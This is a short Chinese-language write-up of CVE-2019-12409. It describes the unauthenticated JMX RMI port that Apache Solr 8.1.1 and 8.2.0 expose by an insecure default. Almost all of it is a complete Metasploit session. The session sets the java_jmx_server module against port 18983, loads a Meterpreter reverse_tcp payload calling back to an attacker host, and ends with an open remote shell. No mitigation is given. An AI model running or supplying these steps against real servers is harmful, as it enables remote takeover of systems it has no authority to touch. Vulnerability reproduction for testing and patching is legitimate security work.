(CVE-2019-12409)Apache Solr JMX 远程命令执行漏洞
一、漏洞简介
Linux 下的环境下的Apache Solr 8.1.1和8.2.0版本
存在默认不安全配置在solr.shENABLE_REMOTE_JMX_OPTS="true"
,将导致启用JMX监视服务并将公网监听一个18983的RMI端口,且无需进行任何身份验证。
二、漏洞影响
Apache Solr 8.1.1和8.2.0版本
三、复现过程
msf5 > use multi/misc/java_jmx_server
msf5 exploit(multi/misc/java_jmx_server) > show options
Module options (exploit/multi/misc/java_jmx_server):
Name Current Setting Required Description
---- --------------- -------- -----------
JMXRMI jmxrmi yes The name where the JMX RMI interface is bound
JMX_PASSWORD no The password to interact with an authenticated JMX endpoint
JMX_ROLE no The role to interact with an authenticated JMX endpoint
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS a.a.a.a
RHOSTS => a.a.a.a
msf5 exploit(multi/misc/java_jmx_server) > set RPORT 18983
RPORT => 18983
msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_jmx_server) > show options
Module options (exploit/multi/misc/java_jmx_server):
Name Current Setting Required Description
---- --------------- -------- -----------
JMXRMI jmxrmi yes The name where the JMX RMI interface is bound
JMX_PASSWORD no The password to interact with an authenticated JMX endpoint
JMX_ROLE no The role to interact with an authenticated JMX endpoint
RHOSTS a.a.a.a yes The target address range or CIDR identifier
RPORT 18983 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf5 exploit(multi/misc/java_jmx_server) > set LHOST b.b.b.b
LHOST => b.b.b.b
msf5 exploit(multi/misc/java_jmx_server) > run
[*] Started reverse TCP handler on b.b.b.b:4444
[*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH
[*] a.a.a.a:18983 - Sending RMI Header...
[*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...
[+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983
[*] a.a.a.a:18983 - Proceeding with handshake...
[+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983
[*] a.a.a.a:18983 - Loading payload...
[*] a.a.a.a:18983 - Replied to request for mlet
[*] a.a.a.a:18983 - Replied to request for payload JAR
[*] a.a.a.a:18983 - Executing payload...
[*] a.a.a.a:18983 - Replied to request for payload JAR
[*] Sending stage (53867 bytes) to a.a.a.a
[*] Meterpreter session 1 opened (a.a.a.a:4444 -> b.b.b.b:46582) at 2019-11-21 15:24:53 +0000
meterpreter >